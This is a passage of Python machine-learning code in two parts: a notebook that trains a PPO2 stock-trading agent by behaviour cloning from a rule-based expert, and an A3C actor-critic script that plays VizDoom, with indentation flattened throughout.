:param num_steps: (int) number of timesteps to evaluate it
:return: (float) Mean reward over the evaluated episode(s)
"""
episode_rewards = [0.0]
obs = env.reset()
done = False
while not done:
# _states are only useful when using LSTM policies
action, _states = model.predict(obs)
obs, reward, done, info = env.step(action)
# Stats
episode_rewards[-1] += reward
# Compute mean reward for the last 100 episodes
mean_100ep_reward = round(np.mean(episode_rewards[-100:]), 1)
print("Mean reward:", mean_100ep_reward, "Num episodes:", len(episode_rewards))
return mean_100ep_reward
# Here the expert is a rule-based trader driven by the precomputed local
# minima/maxima (df_min_ts / df_max_ts); it could be any python function.
def expert_trader(_obs, debug_info:bool = False):
"""
Rule-based expert. It buys at precomputed local minima and sells at
local maxima of the closing price, holding its last action otherwise.
:param _obs: (np.ndarray) Current observation
:return: (int) action taken by the expert
"""
global df_min_ts
global df_max_ts
global global_last_action
global global_buy_counter
global global_sell_counter
if debug_info:
print("obs:=", _obs[0][0],_obs[0][1],_obs[0][2],_obs[0][3])
# use df_min_ts.iloc[:, 1] to access columns by indices to match observations arrays
is_buy_action = not (df_min_ts.loc[(df_min_ts.iloc[:, 0] == _obs[0][0]) &
(df_min_ts.iloc[:, 1] == _obs[0][1]) &
(df_min_ts.iloc[:, 2] == _obs[0][2]) &
(df_min_ts.iloc[:, 3] == _obs[0][3])
].empty)
is_sell_action = not (df_max_ts.loc[(df_max_ts.iloc[:, 0] == _obs[0][0]) &
(df_max_ts.iloc[:, 1] == _obs[0][1]) &
(df_max_ts.iloc[:, 2] == _obs[0][2]) &
(df_max_ts.iloc[:, 3] == _obs[0][3])
].empty)
if is_buy_action:
#perform buy action
global_last_action = 1
global_buy_counter += 1
if debug_info:
print("buy-action",global_buy_counter)
elif is_sell_action:
#perform sell action
global_last_action = 0
global_sell_counter += 1
if debug_info:
print("sell-action",global_sell_counter)
else:
#do nothing
pass
return global_last_action
# %% [markdown]
# ## Expert DataSet
# %%
import queue
import time
from multiprocessing import Queue, Process
import cv2 # pytype:disable=import-error
import numpy as np
from joblib import Parallel, delayed
from stable_baselines import logger
class ExpertDataset(object):
"""
Dataset for using behavior cloning or GAIL.
The structure of the expert dataset is a dict, saved as an ".npz" archive.
The dictionary contains the keys 'actions', 'episode_returns', 'rewards', 'obs' and 'episode_starts'.
The corresponding values have data concatenated across episode: the first axis is the timestep,
the remaining axes index into the data. In case of images, 'obs' contains the relative path to
the images, to enable space saving from image compression.
:param expert_path: (str) The path to trajectory data (.npz file). Mutually exclusive with traj_data.
:param traj_data: (dict) Trajectory data, in format described above. Mutually exclusive with expert_path.
:param train_fraction: (float) the train validation split (0 to 1)
for pre-training using behavior cloning (BC)
:param batch_size: (int) the minibatch size for behavior cloning
:param traj_limitation: (int) the number of trajectory to use (if -1, load all)
:param randomize: (bool) if the dataset should be shuffled
:param verbose: (int) Verbosity
:param sequential_preprocessing: (bool) Do not use subprocess to preprocess
the data (slower but use less memory for the CI)
"""
# Excluded attribute when pickling the object
EXCLUDED_KEYS = {'dataloader', 'train_loader', 'val_loader'}
def __init__(self, expert_path=None, traj_data=None, train_fraction=0.7, batch_size=64,
traj_limitation=-1, randomize=True, verbose=1, sequential_preprocessing=False):
if traj_data is not None and expert_path is not None:
raise ValueError("Cannot specify both 'traj_data' and 'expert_path'")
if traj_data is None and expert_path is None:
raise ValueError("Must specify one of 'traj_data' or 'expert_path'")
if traj_data is None:
traj_data = np.load(expert_path, allow_pickle=True)
if verbose > 0:
for key, val in traj_data.items():
print(key, val.shape)
# Array of bool where episode_starts[i] = True for each new episode
episode_starts = traj_data['episode_starts']
traj_limit_idx = len(traj_data['obs'])
if traj_limitation > 0:
n_episodes = 0
# Retrieve the index corresponding
# to the traj_limitation trajectory
for idx, episode_start in enumerate(episode_starts):
n_episodes += int(episode_start)
if n_episodes == (traj_limitation + 1):
traj_limit_idx = idx - 1
observations = traj_data['obs'][:traj_limit_idx]
actions = traj_data['actions'][:traj_limit_idx]
# obs, actions: shape (N * L, ) + S
# where N = # episodes, L = episode length
# and S is the environment observation/action space.
# S = (1, ) for discrete space
# Flatten to (N * L, prod(S))
if len(observations.shape) > 2:
#observations = np.reshape(observations, [-1, np.prod(observations.shape[1:])])
pass
if len(actions.shape) > 2:
#actions = np.reshape(actions, [-1, np.prod(actions.shape[1:])])
pass
indices = np.random.permutation(len(observations)).astype(np.int64)
# Train/Validation split when using behavior cloning
train_indices = indices[:int(train_fraction * len(indices))]
val_indices = indices[int(train_fraction * len(indices)):]
assert len(train_indices) > 0, "No sample for the training set"
assert len(val_indices) > 0, "No sample for the validation set"
self.observations = observations
self.actions = actions
self.returns = traj_data['episode_returns'][:traj_limit_idx]
self.avg_ret = sum(self.returns) / len(self.returns)
self.std_ret = np.std(np.array(self.returns))
self.verbose = verbose
assert len(self.observations) == len(self.actions), "The number of actions and observations differ " "please check your expert dataset"
self.num_traj = min(traj_limitation, np.sum(episode_starts))
self.num_transition = len(self.observations)
self.randomize = randomize
self.sequential_preprocessing = sequential_preprocessing
self.dataloader = None
self.train_loader = DataLoader(train_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
self.val_loader = DataLoader(val_indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=sequential_preprocessing)
if self.verbose >= 1:
self.log_info()
def init_dataloader(self, batch_size):
"""
Initialize the dataloader used by GAIL.
:param batch_size: (int)
"""
indices = np.random.permutation(len(self.observations)).astype(np.int64)
self.dataloader = DataLoader(indices, self.observations, self.actions, batch_size,
shuffle=self.randomize, start_process=False,
sequential=self.sequential_preprocessing)
def __del__(self):
# Exit processes if needed
for key in self.EXCLUDED_KEYS:
if self.__dict__.get(key) is not None:
del self.__dict__[key]
def __getstate__(self):
"""
Gets state for pickling.
Excludes processes that are not pickleable
"""
# Remove processes in order to pickle the dataset.
return {key: val for key, val in self.__dict__.items() if key not in self.EXCLUDED_KEYS}
def __setstate__(self, state):
"""
Restores pickled state.
init_dataloader() must be called
after unpickling before using it with GAIL.
:param state: (dict)
"""
self.__dict__.update(state)
for excluded_key in self.EXCLUDED_KEYS:
assert excluded_key not in state
self.dataloader = None
self.train_loader = None
self.val_loader = None
def log_info(self):
"""
Log the information of the dataset.
"""
logger.log("Total trajectories: {}".format(self.num_traj))
logger.log("Total transitions: {}".format(self.num_transition))
logger.log("Average returns: {}".format(self.avg_ret))
logger.log("Std for returns: {}".format(self.std_ret))
def get_next_batch(self, split=None):
"""
Get the batch from the dataset.
:param split: (str) the type of data split (can be None, 'train', 'val')
:return: (np.ndarray, np.ndarray) inputs and labels
"""
dataloader = {
None: self.dataloader,
'train': self.train_loader,
'val': self.val_loader
}[split]
if dataloader.process is None:
dataloader.start_process()
try:
return next(dataloader)
except StopIteration:
dataloader = iter(dataloader)
return next(dataloader)
def plot(self):
"""
Show histogram plotting of the episode returns
"""
# Isolate dependency since it is only used for plotting and also since
# different matplotlib backends have further dependencies themselves.
import matplotlib.pyplot as plt
plt.hist(self.returns)
plt.show()
class DataLoader(object):
"""
A custom dataloader to preprocessing observations (including images)
and feed them to the network.
Original code for the dataloader from https://github.com/araffin/robotics-rl-srl
(MIT licence)
Authors: Antonin Raffin, René Traoré, Ashley Hill
:param indices: ([int]) list of observations indices
:param observations: (np.ndarray) observations or images path
:param actions: (np.ndarray) actions
:param batch_size: (int) Number of samples per minibatch
:param n_workers: (int) number of preprocessing worker (for loading the images)
:param infinite_loop: (bool) whether to have an iterator that can be reset
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param shuffle: (bool) Shuffle the minibatch after each epoch
:param start_process: (bool) Start the preprocessing process (default: True)
:param backend: (str) joblib backend (one of 'multiprocessing', 'sequential', 'threading'
or 'loky' in newest versions)
:param sequential: (bool) Do not use subprocess to preprocess the data
(slower but use less memory for the CI)
:param partial_minibatch: (bool) Allow partial minibatches (minibatches with a number of element
lesser than the batch_size)
"""
def __init__(self, indices, observations, actions, batch_size, n_workers=1,
infinite_loop=True, max_queue_len=1, shuffle=False,
start_process=True, backend='threading', sequential=False, partial_minibatch=True):
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.indices = indices
self.original_indices = indices.copy()
self.n_minibatches = len(indices) // batch_size
# Add a partial minibatch, for instance
# when there is not enough samples
if partial_minibatch and len(indices) % batch_size > 0:
self.n_minibatches += 1
self.batch_size = batch_size
self.observations = observations
self.actions = actions
self.shuffle = shuffle
self.queue = Queue(max_queue_len)
self.process = None
self.load_images = isinstance(observations[0], str)
self.backend = backend
self.sequential = sequential
self.start_idx = 0
if start_process:
self.start_process()
def start_process(self):
"""Start preprocessing process"""
# Skip if in sequential mode
if self.sequential:
return
self.process = Process(target=self._run)
# Make it a daemon, so it is terminated together
# with the main process
self.process.daemon = True
self.process.start()
@property
def _minibatch_indices(self):
"""
Current minibatch indices given the current pointer
(start_idx) and the minibatch size
:return: (np.ndarray) 1D array of indices
"""
return self.indices[self.start_idx:self.start_idx + self.batch_size]
def sequential_next(self):
"""
Sequential version of the pre-processing.
"""
if self.start_idx > len(self.indices):
raise StopIteration
if self.start_idx == 0:
if self.shuffle:
# Shuffle indices
np.random.shuffle(self.indices)
obs = self.observations[self._minibatch_indices]
if self.load_images:
obs = np.concatenate([self._make_batch_element(image_path) for image_path in obs],
axis=0)
actions = self.actions[self._minibatch_indices]
self.start_idx += self.batch_size
return obs, actions
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend=self.backend) as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
np.random.shuffle(self.indices)
for minibatch_idx in range(self.n_minibatches):
self.start_idx = minibatch_idx * self.batch_size
obs = self.observations[self._minibatch_indices]
if self.load_images:
if self.n_workers <= 1:
obs = [self._make_batch_element(image_path)
for image_path in obs]
else:
obs = parallel(delayed(self._make_batch_element)(image_path)
for image_path in obs)
obs = np.concatenate(obs, axis=0)
actions = self.actions[self._minibatch_indices]
self.queue.put((obs, actions))
# Free memory
del obs
self.queue.put(None)
@classmethod
def _make_batch_element(cls, image_path):
"""
Process one element.
:param image_path: (str) path to an image
:return: (np.ndarray)
"""
# cv2.IMREAD_UNCHANGED is needed to load
# grey and RGBa images
image = cv2.imread(image_path, cv2.IMREAD_UNCHANGED)
if image is None:
raise ValueError("Tried to load {}, but it was not found".format(image_path))
# Grey image
if len(image.shape) == 2:
image = image[:, :, np.newaxis]
# Convert from BGR to RGB
if image.shape[-1] == 3:
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = image.reshape((1,) + image.shape)
return image
def __len__(self):
return self.n_minibatches
def __iter__(self):
self.start_idx = 0
self.indices = self.original_indices.copy()
return self
def __next__(self):
if self.sequential:
return self.sequential_next()
if self.process is None:
raise ValueError("You must call .start_process() before using the dataloader")
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
def __del__(self):
if self.process is not None:
self.process.terminate()
# %% [markdown]
# # Trading Data
# %%
symbol = 'AAPL'
exchange = 'NASDAQ'
start_date = '2010-01-01'
end_date = '2020-12-11'
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date, plot=True)
quotes.head()
# %% [markdown]
# ## Apply Technical-Indicators (TA)
# - Check https://github.com/bukosabino/ta
# - TA- Visualization: https://github.com/bukosabino/ta/blob/master/examples_to_use/visualize_features.ipynb
# %%
# get ta-indicators
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True,plot=True,apply_pct=False)
data.tail()
# %% [markdown]
# ## Get Local Minima/Maxima
#
# %%
# get Min/Max TimeStamps
tmp_data = data.iloc[:,0:4]
tmp_data['org_close'] = quotes['close']
df_min_ts, df_max_ts = find_loc_min_max(data=tmp_data,order_of_points=7, plot=True)
df_min_ts.head()
# %% [markdown]
# # Create Trading-Environment
# %%
env = create_trade_env(quotes, data,symbol)
# %%
env.observer.feed.next()
# %% [markdown]
# # Train RL-Agent using Expert-Records
# %%
# PPO2-Model
from stable_baselines.common.policies import MlpPolicy, MlpLnLstmPolicy
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
agent = PPO2(MlpPolicy, env=VecEnv, verbose=1,tensorboard_log=os.path.join(currentdir,"logs"))
# Pretrain the PPO2 model
#agent.pretrain(dataset, n_epochs=1000)
# As an option, you can train the RL agent
agent.learn(int(1e5),tb_log_name="learn_"+symbol)
agent.save(save_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
# %%
# Load the TensorBoard notebook extension
get_ipython().run_line_magic('load_ext', 'tensorboard')
get_ipython().run_line_magic('tensorboard', '--logdir logs/')
#tensorboard = TensorBoard(log_dir="./logs")
# %% [markdown]
# ## Evaluate Model
# %%
symbol = 'AACQU'
start_date = '2010-01-01'
end_date = '2020-12-11'
#MSFT, TSLA, AAPL,NFLX,GOOG, GLD
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
#df_min_ts, df_max_ts = find_loc_min_max(data=quotes,order_of_points=7, plot=True)
env = create_trade_env(quotes, data,symbol)
# %%
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
agent = PPO2.load(load_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
#agent = DQN.load(load_path=os.path.join(currentdir, "agents","DQN_MlpPolicy_02.zip"), env=env)
evaluate_model(agent, env)
# %%
#portfolio.performance.net_worth.plot()
performance = pd.DataFrame.from_dict(env.action_scheme.portfolio.performance, orient='index')
performance['net_worth'].plot()
# %%
performance['net_worth'].tail()
# %% [markdown]
# # Load Financial Symbols
# %%
get_ipython().system('pip install finsymbols')
# %%
from finsymbols import symbols
import json
import pprint
#symbol_list = symbols.get_sp500_symbols()
#symbol_list.extend(symbols.get_amex_symbols())
#symbol_list.extend(symbols.get_nyse_symbols())
#symbol_list.extend(symbols.get_nasdaq_symbols())
symbol_list = symbols.get_nasdaq_symbols()
column_names = ['company','headquarters', 'industry','sector','symbol']
df = pd.DataFrame(symbol_list, columns=column_names)
my_symbols = df['symbol'].replace("\n", "", regex=True)
# %% [markdown]
# # Loops
# %% [markdown]
# ## Create expert Recordings
# %%
# Download List of NASDAQ Instruments
df = pd.read_csv('nasdaq_list.csv')
#df = df.iloc[17:]
df.head()
# %%
start_date = '2010-01-01'
end_date = '2020-12-11'
for symbol in df['Symbol']:
#MSFT, TSLA, AAPL,NFLX,GOOG, GLD
print("symbol:=", symbol)
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
if (not quotes.empty) and (len(quotes)>100):
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
# get Min/Max TimeStamps
tmp_data = data.iloc[:,0:4]
tmp_data['org_close'] = quotes['close']
df_min_ts, df_max_ts = find_loc_min_max(data=tmp_data,order_of_points=7, plot=True, symbol=symbol)
env = create_trade_env(quotes, data,symbol)
global_buy_counter = 0
global_sell_counter = 0
global_last_action = 0
try:
generate_expert_traj(expert_trader, 'expert_trader_'+symbol, env, n_episodes=10)
except Exception as e:
print("An exception occurred while generating recording for symbol:=", symbol, e)
# %% [markdown]
# ## Training Loop
# %%
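# Overview of the loop below: for every expert_trader_<SYMBOL>.npz recording found in the
# working directory, rebuild the trading environment for that symbol, load (or create) the
# shared PPO2 agent, behaviour-clone it on the recording via agent.pretrain(), fine-tune it
# with agent.learn(), and save the updated model back to model_path.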
current = os.getcwd()
model_path = os.path.join(currentdir, "LOOP_PPO2_MlpPolicy_NORM.zip")
for filename in os.listdir(current):
#extract pretrain file
if filename.endswith(".npz"):
# get symbol-name
x = filename.split("expert_trader_")
x= x[1].split(".npz")
symbol=x[0]
f = open('training_progress.txt', 'a')
f.write("pre-train: " + symbol)
f.close()
# create env
quotes = download_data(symbol=symbol, start_date=start_date, end_date=end_date,plot=True)
data = add_custom_ta_features(quotes,"open","high","low","close", fillna=True)
env = create_trade_env(quotes, data,symbol)
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
if os.path.isfile(model_path):
#load agent
agent = PPO2.load(load_path=model_path, env=VecEnv,tensorboard_log=os.path.join(currentdir,"logs"))
print("Agent has been loaded: Symbol= ", symbol)
else:
#create new agent
agent = PPO2(policy=MlpPolicy, env=VecEnv, verbose=1,tensorboard_log=os.path.join(currentdir,"logs"))
print("new Agent has been created: Symbol= ", symbol)
# Pretrain the PPO2 model
dataset = ExpertDataset(expert_path='expert_trader_'+ symbol +'.npz',
traj_limitation=10, batch_size=64, randomize = False)
agent.pretrain(dataset, n_epochs=100)
# As an option, you can train the RL agent
agent.learn(int(1e4),tb_log_name="learn_"+symbol)
#save Model
agent.save(save_path=model_path)
print("Agent has been Saved: Symbol= ", symbol)
print("--------------------------------------------------")
else:
continue
# %%
VecEnv = DummyVecEnv([lambda: create_trade_env(quotes, data,symbol)])
#agent = DQN.load(load_path=os.path.join(currentdir, "agents","DQN_MlpPolicy_02.zip"), env=env)
evaluate_model(agent, env)
# %%
agent = PPO2.load(load_path=os.path.join(currentdir, "BC_PPO2_MlpPolicy_NORM.zip"))
# Pretrain the PPO2 model
agent.pretrain(dataset, n_epochs=1000)
# As an option, you can train the RL agent
agent.learn(int(1e5),tb_log_name="learn_"+symbol)
# %% [markdown]
# # Evaluate using Pyfolio
# %%
# Helper for the pyfolio evaluation: `px` is assumed to be a price DataFrame with
# 'AdjClose'/'AdjOpen' columns, and the function name is only a placeholder.
def compute_pyfolio_returns(px, symbol):
    rets = px[['AdjClose']]
    rets = rets.shift(-1)
    rets.iloc[-1]['AdjClose'] = px.tail(1)['AdjOpen']
    rets = rets.shift(1) / rets - 1
    rets = rets.dropna()
    rets.index = rets.index.to_datetime()
    rets.index = rets.index.tz_localize("UTC")
    rets.columns = [symbol]
    return rets
|
doom.py
|
import os
import threading
import multiprocessing
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
import scipy.misc
from helper import *
from vizdoom import *
from random import choice
from time import sleep
from time import time
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope,to_scope):
from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
op_holder = []
for from_var,to_var in zip(from_vars,to_vars):
op_holder.append(to_var.assign(from_var))
return op_holder
# Processes Doom screen image to produce cropped and resized image.
def process_frame(frame):
s = frame[10:-10,30:-30]
s = scipy.misc.imresize(s,[84,84])
s = np.reshape(s,[np.prod(s.shape)]) / 255.0
return s
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
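# Quick illustration of discount(): discount([r0, r1, r2], g) == [r0 + g*r1 + g**2*r2,
# r1 + g*r2, r2], i.e. each entry is the gamma-discounted sum of rewards from that step onward
# (the lfilter call computes this by running a first-order IIR filter over the reversed array).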
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
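# The initializer above draws N(0, 1) weights and rescales each output column so its L2 norm
# equals `std`; small std values (e.g. 0.01 for the policy head below) keep the initial policy
# close to uniform.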
class AC_Network():
def __init__(self,s_size,a_size,scope,trainer):
with tf.variable_scope(scope):
#Input and visual encoding layers
self.inputs = tf.placeholder(shape=[None,s_size],dtype=tf.float32)
self.imageIn = tf.reshape(self.inputs,shape=[-1,84,84,1])
self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.imageIn,num_outputs=16,
kernel_size=[8,8],stride=[4,4],padding='VALID')
self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
inputs=self.conv1,num_outputs=32,
kernel_size=[4,4],stride=[2,2],padding='VALID')
hidden = slim.fully_connected(slim.flatten(self.conv2),256,activation_fn=tf.nn.elu)
#Recurrent network for temporal dependencies
lstm_cell = tf.contrib.rnn.BasicLSTMCell(256,state_is_tuple=True)
c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
self.state_init = [c_init, h_init]
c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
self.state_in = (c_in, h_in)
rnn_in = tf.expand_dims(hidden, [0])
step_size = tf.shape(self.imageIn)[:1]
state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
time_major=False)
lstm_c, lstm_h = lstm_state
self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
rnn_out = tf.reshape(lstm_outputs, [-1, 256])
#Output layers for policy and value estimations
self.policy = slim.fully_connected(rnn_out,a_size,
activation_fn=tf.nn.softmax,
weights_initializer=normalized_columns_initializer(0.01),
biases_initializer=None)
self.value = slim.fully_connected(rnn_out,1,
activation_fn=None,
weights_initializer=normalized_columns_initializer(1.0),
biases_initializer=None)
#Only the worker network need ops for loss functions and gradient updating.
if scope != 'global':
self.actions = tf.placeholder(shape=[None],dtype=tf.int32)
self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32)
self.target_v = tf.placeholder(shape=[None],dtype=tf.float32)
self.advantages = tf.placeholder(shape=[None],dtype=tf.float32)
self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])
#Loss functions
self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1])))
self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)
self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01
#Get gradients from local network using local losses
local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
self.gradients = tf.gradients(self.loss,local_vars)
self.var_norms = tf.global_norm(local_vars)
grads,self.grad_norms = tf.clip_by_global_norm(self.gradients,40.0)
#Apply local gradients to global network
global_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, 'global')
self.apply_grads = trainer.apply_gradients(zip(grads,global_vars))
class Atari(object):
    # Minimal stub wrapper (not used by the Doom workers below); it simply stores its arguments.
    def __init__(self, game, action_repeat):
        self.game = game
        self.action_repeat = action_repeat
class Worker():
def __init__(self,game,name,s_size,a_size,trainer,model_path,global_episodes):
self.name = "worker_" + str(name)
self.number = name
self.model_path = model_path
self.trainer = trainer
self.global_episodes = global_episodes
self.increment = self.global_episodes.assign_add(1)
self.episode_rewards = []
self.episode_lengths = []
self.episode_mean_values = []
self.summary_writer = tf.summary.FileWriter("train_"+str(self.number))
#Create the local copy of the network and the tensorflow op to copy global paramters to local network
self.local_AC = AC_Network(s_size,a_size,self.name,trainer)
self.update_local_ops = update_target_graph('global',self.name)
#The Below code is related to setting up the Doom environment
game.set_doom_scenario_path("basic.wad") #This corresponds to the simple task we will pose our agent
game.set_doom_map("map01")
game.set_screen_resolution(ScreenResolution.RES_160X120)
game.set_screen_format(ScreenFormat.GRAY8)
game.set_render_hud(False)
game.set_render_crosshair(False)
game.set_render_weapon(True)
game.set_render_decals(False)
game.set_render_particles(False)
game.add_available_button(Button.MOVE_LEFT)
game.add_available_button(Button.MOVE_RIGHT)
game.add_available_button(Button.ATTACK)
game.add_available_game_variable(GameVariable.AMMO2)
game.add_available_game_variable(GameVariable.POSITION_X)
game.add_available_game_variable(GameVariable.POSITION_Y)
game.set_episode_timeout(300)
game.set_episode_start_time(10)
game.set_window_visible(False)
game.set_sound_enabled(False)
game.set_living_reward(-1)
game.set_mode(Mode.PLAYER)
game.init()
self.actions = [[True,False,False],[False,True,False],[False,False,True]]
#End Doom set-up
self.env = game
# env = ENVIRONMENT  # template placeholder; the actual environment is stored in self.env above
def train(self,rollout,sess,gamma,bootstrap_value):
rollout = np.array(rollout)
observations = rollout[:,0]
actions = rollout[:,1]
rewards = rollout[:,2]
next_observations = rollout[:,3]
values = rollout[:,5]
# Here we take the rewards and values from the rollout, and use them to
# generate the advantage and discounted returns.
# The advantage function uses "Generalized Advantage Estimation"
self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value])
discounted_rewards = discount(self.rewards_plus,gamma)[:-1]
self.value_plus = np.asarray(values.tolist() + [bootstrap_value])
advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1]
advantages = discount(advantages,gamma)
# Update the global network using gradients from loss
# Generate network statistics to periodically save
rnn_state = self.local_AC.state_init
feed_dict = {self.local_AC.target_v:discounted_rewards,
self.local_AC.inputs:np.vstack(observations),
self.local_AC.actions:actions,
self.local_AC.advantages:advantages,
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]}
v_l,p_l,e_l,g_n,v_n,_ = sess.run([self.local_AC.value_loss,
self.local_AC.policy_loss,
self.local_AC.entropy,
self.local_AC.grad_norms,
self.local_AC.var_norms,
self.local_AC.apply_grads],
feed_dict=feed_dict)
return v_l / len(rollout),p_l / len(rollout),e_l / len(rollout), g_n,v_n
def work(self,max_episode_length,gamma,sess,coord,saver):
episode_count = sess.run(self.global_episodes)
total_steps = 0
print ("Starting worker " + str(self.number))
with sess.as_default(), sess.graph.as_default():
while not coord.should_stop():
sess.run(self.update_local_ops)
episode_buffer = []
episode_values = []
episode_frames = []
episode_reward = 0
episode_step_count = 0
d = False
self.env.new_episode()
s = self.env.get_state().screen_buffer
episode_frames.append(s)
s = process_frame(s)
rnn_state = self.local_AC.state_init
while self.env.is_episode_finished() == False:
#Take an action using probabilities from policy network output.
a_dist,v,rnn_state = sess.run([self.local_AC.policy,self.local_AC.value,self.local_AC.state_out],
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})
a = np.random.choice(a_dist[0],p=a_dist[0])
a = np.argmax(a_dist == a)
r = self.env.make_action(self.actions[a]) / 100.0
d = self.env.is_episode_finished()
if d == False:
s1 = self.env.get_state().screen_buffer
episode_frames.append(s1)
s1 = process_frame(s1)
else:
s1 = s
episode_buffer.append([s,a,r,s1,d,v[0,0]])
episode_values.append(v[0,0])
episode_reward += r
s = s1
total_steps += 1
episode_step_count += 1
# If the episode hasn't ended, but the experience buffer is full, then we
# make an update step using that experience rollout.
if len(episode_buffer) == 30 and d != True and episode_step_count != max_episode_length - 1:
# Since we don't know what the true final return is, we "bootstrap" from our current
# value estimation.
v1 = sess.run(self.local_AC.value,
feed_dict={self.local_AC.inputs:[s],
self.local_AC.state_in[0]:rnn_state[0],
self.local_AC.state_in[1]:rnn_state[1]})[0,0]
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,v1)
episode_buffer = []
sess.run(self.update_local_ops)
if d == True:
break
self.episode_rewards.append(episode_reward)
self.episode_lengths.append(episode_step_count)
self.episode_mean_values.append(np.mean(episode_values))
# Update the network using the experience buffer at the end of the episode.
if len(episode_buffer) != 0:
v_l,p_l,e_l,g_n,v_n = self.train(episode_buffer,sess,gamma,0.0)
# Periodically save gifs of episodes, model parameters, and summary statistics.
if episode_count % 5 == 0 and episode_count != 0:
if self.name == 'worker_0' and episode_count % 25 == 0:
time_per_step = 0.05
images = np.array(episode_frames)
make_gif(images,'./frames/image'+str(episode_count)+'.gif',
duration=len(images)*time_per_step,true_image=True,salience=False)
if episode_count % 250 == 0 and self.name == 'worker_0':
saver.save(sess,self.model_path+'/model-'+str(episode_count)+'.cptk')
print ("Saved Model")
mean_reward = np.mean(self.episode_rewards[-5:])
mean_length = np.mean(self.episode_lengths[-5:])
mean_value = np.mean(self.episode_mean_values[-5:])
summary = tf.Summary()
summary.value.add(tag='Perf/Reward', simple_value=float(mean_reward))
summary.value.add(tag='Perf/Length', simple_value=float(mean_length))
summary.value.add(tag='Perf/Value', simple_value=float(mean_value))
summary.value.add(tag='Losses/Value Loss', simple_value=float(v_l))
summary.value.add(tag='Losses/Policy Loss', simple_value=float(p_l))
summary.value.add(tag='Losses/Entropy', simple_value=float(e_l))
summary.value.add(tag='Losses/Grad Norm', simple_value=float(g_n))
summary.value.add(tag='Losses/Var Norm', simple_value=float(v_n))
self.summary_writer.add_summary(summary, episode_count)
self.summary_writer.flush()
if self.name == 'worker_0':
sess.run(self.increment)
episode_count += 1
max_episode_length = 300
gamma = .99 # discount rate for advantage estimation and reward discounting
s_size = 7056 # Observations are greyscale frames of 84 * 84 * 1
a_size = 3 # Agent can move Left, Right, or Fire
load_model = False
model_path = './model'
tf.reset_default_graph()
if not os.path.exists(model_path):
os.makedirs(model_path)
#Create a directory to save episode playback gifs to
if not os.path.exists('./frames'):
os.makedirs('./frames')
with tf.device("/cpu:0"):
global_episodes = tf.Variable(0,dtype=tf.int32,name='global_episodes',trainable=False)
trainer = tf.train.AdamOptimizer(learning_rate=1e-4)
master_network = AC_Network(s_size,a_size,'global',None) # Generate global network
num_workers = multiprocessing.cpu_count() # Set workers to the number of available CPU threads
workers = []
# Create worker classes
for i in range(num_workers):
workers.append(Worker(DoomGame(),i,s_size,a_size,trainer,model_path,global_episodes))
saver = tf.train.Saver(max_to_keep=5)
with tf.Session() as sess:
coord = tf.train.Coordinator()
if load_model == True:
print ('Loading Model...')
ckpt = tf.train.get_checkpoint_state(model_path)
saver.restore(sess,ckpt.model_checkpoint_path)
else:
sess.run(tf.global_variables_initializer())
# This is where the asynchronous magic happens.
# Start the "work" process for each worker in a separate threat.
